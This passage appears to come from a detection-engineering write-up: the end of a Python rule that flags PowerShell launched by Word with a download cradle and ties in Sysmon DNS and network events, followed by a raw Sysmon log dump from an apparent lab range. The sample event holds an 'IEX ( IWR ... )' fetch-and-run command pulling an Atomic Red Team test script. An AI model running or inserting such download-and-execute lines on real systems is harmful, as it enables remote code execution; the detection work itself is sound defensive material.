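            "rule": "office_spawned_shell_download_cradle",
            "host": ev.get("Computer"),
            "parent": ev.get("ParentCommandLine"),
            "child_pid": ev.get("ProcessId"),
            "urls": URL_RE.findall(ev.get("CommandLine", "")),
            "dns": [e["QueryName"] for e in events
                    if e.get("EventID") == 22 and same_process(ev, e, window_seconds)],
            "net": [f'{e["DestinationIp"]}:{e["DestinationPort"]}' for e in events
                    if e.get("EventID") == 3 and same_process(ev, e, window_seconds)],
        })
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
GUID_PS = "{21761711-6127-6080-BD5D-00000000BB01}"
HOST = "win-host-5.attackrange.local"
# Constructed sample; field values lifted from the dump above.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": HOST, "UtcTime": "2021-04-21 17:30:15.592", "ProcessGuid": GUID_PS,
     "ProcessId": 1572, "Image": PS, "IntegrityLevel": "High",
     "CommandLine": f'"{PS}" IEX ( IWR -uri \'https://raw.githubusercontent.com/redcanaryco/'
                    "atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')",
     "ParentProcessId": 5624, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentCommandLine": r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f '
                          r'"C:\Users\Administrator\Desktop\cs_doc1_rundll32.dotm'},
    # conhost.exe started by that PowerShell: an ordinary child, must not fire.
    {"EventID": 1, "Computer": HOST, "UtcTime": "2021-04-21 17:30:15.595",
     "ProcessGuid": "{21761711-6127-6080-BE5D-00000000BB01}", "ProcessId": 5424,
     "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "ParentProcessId": 1572, "ParentImage": PS},
    {"EventID": 22, "Computer": HOST, "UtcTime": "2021-04-21 17:30:15.780", "ProcessGuid": GUID_PS,
     "ProcessId": 1572, "Image": PS, "QueryName": "raw.githubusercontent.com"},
    # Connection logged before Sysmon resolved the process: zero GUID, unknown image.
    {"EventID": 3, "Computer": HOST, "UtcTime": "2021-04-21 17:30:15.428", "ProcessGuid": NULL_GUID,
     "ProcessId": 1572, "Image": "<unknown process>",
     "DestinationIp": "185.199.111.133", "DestinationPort": 443},
    # Connection from another process (rundll32, PID 5080): must not be attached to the alert.
    {"EventID": 3, "Computer": HOST, "UtcTime": "2021-04-21 17:29:57.529",
     "ProcessGuid": "{21761711-4F44-6080-945B-00000000BB01}", "ProcessId": 5080,
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "DestinationIp": "34.218.235.219", "DestinationPort": 443},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Running the block yields a single alert for PID 1572 that carries the fetched URL, the raw.githubusercontent.com lookup and the 185.199.111.133:443 connection, while the conhost.exe child and the rundll32.exe connection stay out of it. The time-window fallback is deliberately narrow: without a ProcessGuid, a PID is all the event gives you, and Windows reuses PIDs, so widen the window only as far as your environment's logging latency actually requires.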
12241200x80000000000000001530395Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 11241100x80000000000000001530394Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\amsi_tracer\-176455006_WINWORD.EXE_5624_1300_840.dmp2021-04-21 17:30:15.585 13241300x80000000000000001530393Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.570{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530392Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.570{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 10341000x80000000000000001530391Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.570{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft 
Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530390Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.164{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530389Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.164{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880B4479144C9B7114A80C379B9BBCC7,SHA256=CF55BB7187EE5F5371E3BA9ECC6602574846C69A3FF784705CAA8DF9D0C35AB4falsefalse - insufficient disk space 11241100x80000000000000001530883Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.719{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-04-19 13:20:06.758 23542300x80000000000000001530882Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:16.719{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DBE6F8B8D52786D84986AD713BEF83D8,SHA256=5B2F5B50D29668326FDF661A35BA258C0CF5B0266A80E1B7B97C753382AB9D20falsefalse - insufficient disk space 11241100x80000000000000001530881Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.670{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530880Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.670{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48AB15B0AAB8381640AD0F209ABFCA4D,SHA256=970D2E10D547613ED65E44F1E3139E9B2101A7F2C19628FE9306A5A294E7C142falsefalse - insufficient disk space 12241200x80000000000000001530879Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:16.603{21761711-EE8A-607D-CF12-00000000BB01}7212C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001530878Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:16.603{21761711-EE8A-607D-CF12-00000000BB01}7212C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x80000000000000001530877Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:16.171{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530876Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.171{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA22001AD2801758C3E084CB53A53424,SHA256=42F16B167222059386600BEE16E80D1D0E3DDBEED6048E4DD0B12C184F382690falsefalse - insufficient disk space 10341000x80000000000000001061104Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:16.047{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061103Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:16.047{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061102Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:16.044{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=434C876E5771D83725262521A796C26C,SHA256=5C40236CA47DB09A19BC811CD55D1A522F778CB76FF2BFA29BF2C59E2BF2F0A5,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001530875Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:16.018{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498\VirtualDesktopBinary Data 12241200x80000000000000001530874Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:16.018{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498 11241100x80000000000000001530873Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:16.002{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530872Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.002{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3DA9202B184268583E8C7D1E3572475,SHA256=9982F514FAB6D244C88E928750F9992BF6CCE2C5EC7CFA8408AC2F35467BFC6Bfalsefalse - insufficient disk space 22542200x80000000000000001530894Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.780{21761711-6127-6080-BD5D-00000000BB01}1572raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;::ffff:185.199.110.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 12241200x80000000000000001530893Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:17.673{21761711-FD8A-607E-F232-00000000BB01}5776C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001530892Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:17.668{21761711-FD8A-607E-F232-00000000BB01}5776C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 13241300x80000000000000001530891Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
17:30:17.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000014069A\VirtualDesktopBinary Data 12241200x80000000000000001530890Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:17.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000014069A 10341000x80000000000000001530889Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.236{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530888Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:17.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530887Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
17:30:17.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 10341000x80000000000000001530886Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.236{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530885Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.174{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530884Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.174{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5261AB0855C59193C66F04FA33F938AC,SHA256=EB1F1501C0A0F6D1981BD9CC7533FFDDC59559CD0BD848CAEA674F52E31634FAfalsefalse - 
insufficient disk space 23542300x80000000000000001061107Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:17.048{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E78927722929B540D36F320F86F259F,SHA256=B3342F5839457CBB23219FFA1A169A2664C900782F603A729EEF50B784936915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061106Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:17.048{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061105Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:17.048{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
13241300x80000000000000001530903Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:18.971{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530902Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:18.971{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 354300x80000000000000001530901Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.807{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64685-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x80000000000000001530900Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.158{21761711-EE8A-607D-CF12-00000000BB01}7212C:\Windows\SysWOW64\dllhost.exeWIN-HOST-5\Administratortcptruefalse10.0.1.15win-host-5.attackrange.local64684-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 354300x80000000000000001530899Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.428{00000000-0000-0000-0000-000000000000}1572<unknown process>-tcptruefalse10.0.1.15win-host-5.attackrange.local64683-false185.199.111.133cdn-185-199-111-133.github.com443https 11241100x80000000000000001530898Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:18.276{21761711-8437-607D-CE00-00000000BB01}2032C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530897Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:18.276{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE11C129F1CCBE3586D31DFE581DA7FC,SHA256=862E3FB18E0B5348D6572F7EBF4105B49B45AA92954316AAE87F98533DFF3FA7falsefalse - insufficient disk space 23542300x80000000000000001061110Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:18.050{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0048B23AE5F862CF44A2ACACD5B11289,SHA256=FB5C467F21259FC480D884E26F8BB677D716C73F8455D7933756791B0B311CC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061109Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:18.048{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001061108Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:18.048{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530896Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:18.272{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530895Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:18.272{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=493CFD3456AACCA9F1F5511CB44B439F,SHA256=0C49014982DD8988834F26225F0B694F3165C5DAD53DD8CCBF8B192BDFF78696falsefalse - insufficient disk space 354300x80000000000000001530906Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.223{21761711-FD8A-607E-F232-00000000BB01}5776C:\Windows\SysWOW64\dllhost.exeWIN-HOST-5\Administratortcptruefalse10.0.1.15win-host-5.attackrange.local64686-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x80000000000000001530905Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
